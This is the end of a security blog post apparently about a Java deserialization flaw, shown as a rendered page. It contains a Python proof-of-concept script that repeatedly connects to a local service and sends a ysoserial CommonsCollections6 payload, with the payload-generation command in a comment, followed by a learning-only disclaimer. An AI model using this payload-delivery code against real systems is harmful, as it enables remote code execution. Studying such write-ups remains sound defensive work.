<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> time<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">connect_to_server</span>():</span><br>    max_attempts = <span class="hljs-number">100000</span> <span class="hljs-comment">#Less than 10000 connections will not end the script, the purpose is to maintain a continuous connection</span><br>    attempts = <span class="hljs-number">0</span><br><br>    <span class="hljs-keyword">while</span> attempts &lt; max_attempts:<br>        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br>        host = <span class="hljs-string">&quot;127.0.0.1&quot;</span><br>        port = <span class="hljs-number">9090</span><br><br>        <span class="hljs-keyword">try</span>:<br>            client_socket.connect((host, port))<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;connect to <span class="hljs-subst">&#123;host&#125;</span>:<span class="hljs-subst">&#123;port&#125;</span>&quot;</span>)<br>            <span class="hljs-keyword">return</span> client_socket<br><br>        <span class="hljs-keyword">except</span> socket.error <span class="hljs-keyword">as</span> e:<br>            attempts += <span class="hljs-number">1</span><br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;error,reconnect (<span class="hljs-subst">&#123;attempts&#125;</span>/<span class="hljs-subst">&#123;max_attempts&#125;</span>): <span class="hljs-subst">&#123;e&#125;</span>&quot;</span>)<br>            time.sleep(<span class="hljs-number">1</span>)<br><br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;error <span class="hljs-subst">&#123;host&#125;</span>:<span class="hljs-subst">&#123;port&#125;</span>,reached maximum number of attempts&quot;</span>)<br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">None</span><br><br><span class="hljs-comment">#Even if the server closes the connection, it will not end the POC</span><br><span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>    client_socket = connect_to_server()<br><br>    <span class="hljs-keyword">if</span> client_socket:<br>        <span class="hljs-keyword">try</span>:<br><span class="hljs-comment">#Generate a payload for &#x27;commons-collections&#x27; using &#x27;ysoserial&#x27;,command:java -jar ysoserial.jar CommonsCollections6 &quot;calc&quot; &gt; cc6calc.ser</span><br>            <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;cc6calc.ser&quot;</span>, <span class="hljs-string">&quot;rb&quot;</span>) <span class="hljs-keyword">as</span> file:<br>                <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>                    data_to_send = file.read(<span class="hljs-number">1024</span>)<br>                    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> data_to_send:<br>                        <span class="hljs-keyword">break</span><br>                    client_socket.send(data_to_send)<br>            response_data = client_socket.recv(<span class="hljs-number">1024</span>)<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;response received from the server: <span class="hljs-subst">&#123;response_data.decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>, <span class="hljs-string">&#x27;replace&#x27;</span>)&#125;</span>&quot;</span>)<br><br>        <span class="hljs-keyword">finally</span>:<br>            client_socket.close()<br></code></pre></div></td></tr></table></figure>

<p><strong>As I said before, this loophole is difficult to exploit and can only be used for learning.</strong></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">

                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a>
                    
                  </div>
                
              </div>
              <hr>
              <script src="https://utteranc.es/client.js"
        repo="novysodope/novysodope.github.io"
        issue-term="title"
        label="Comment"
        theme="github-light"
        crossorigin="anonymous"
        async>
</script>
<hr>
              
                <p class="note note-warning">
                  
                    声明：<br>   本文章用于学习交流，严禁用于非法操作，出现后果一切自行承担，阅读此文章表示你已同意本声明。<br> <br> Disclaimer: <br>   This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/05/27/110/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Windows file-explorer#preview-pane-previewers DOS</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/12/18/104/">
                        <span class="hidden-mobile">车联网学习笔记1</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>


            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->

  <div class="col-lg-7 mx-auto nopadding-x-md">
    <div class="container custom post-custom mx-auto">
      <img src="/img/aa.png" srcset="/img/loading.gif" lazyload class="rounded mx-auto d-block mt-5" style="width:150px; height:150px;"><p></p> <p style="text-align:center"><span>扫一扫关注我们</span></p>
    </div>
  </div>


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     © 2018-<script type="text/javascript">document.write(new Date().getFullYear());</script> <span> <a href="#" target="_blank" rel="nofollow noopener"><font color="#2ca6cb">novy`s Blog</font>.</a> </span> Powered by <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span><font color="#2ca6cb">Hexo</font></span></a><p><script> function secondToDate(second) { if (!second) { return 0; } var time = new Array(0, 0, 0, 0, 0); if (second >= 365 * 24 * 3600) { time[0] = parseInt(second / (365 * 24 * 3600)); second %= 365 * 24 * 3600; } if (second >= 24 * 3600) { time[1] = parseInt(second / (24 * 3600)); second %= 24 * 3600; } if (second >= 3600) { time[2] = parseInt(second / 3600); second %= 3600; } if (second >= 60) { time[3] = parseInt(second / 60); second %= 60; } if (second > 0) { time[4] = second; } return time; }</script> <script type="text/javascript" language="javascript"> function setTime() { var create_time = Math.round(new Date(Date.UTC(2018, 11, 09, 6, 6, 6)).getTime() / 1000); var timestamp = Math.round((new Date().getTime() + 8 * 60 * 60 * 1000) / 1000); currentTime = secondToDate((timestamp - create_time)); currentTimeHtml = currentTime[0] + "年" + currentTime[1] + "天" + currentTime[2] + "时" + currentTime[3] + "分" + currentTime[4] + "秒"; document.getElementById("htmer_time").innerHTML = currentTimeHtml; }    setInterval(setTime, 1000);</script> 本博客已经稳定运行：<span id="htmer_time" style="color: #2ca6cb;"></span> <br/> <script async="" src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

你是第<font color="#2ca6cb"><span id="busuanzi_value_site_uv"></span></font>个小伙伴 </p> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  




  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>












  
    <!-- Baidu Analytics -->
    <script defer>
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?a6c1581442f57290135c4581f8de49ff";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  

  

  

  

  






<script  src="/js/boot.js" ></script>


</body>
</html>
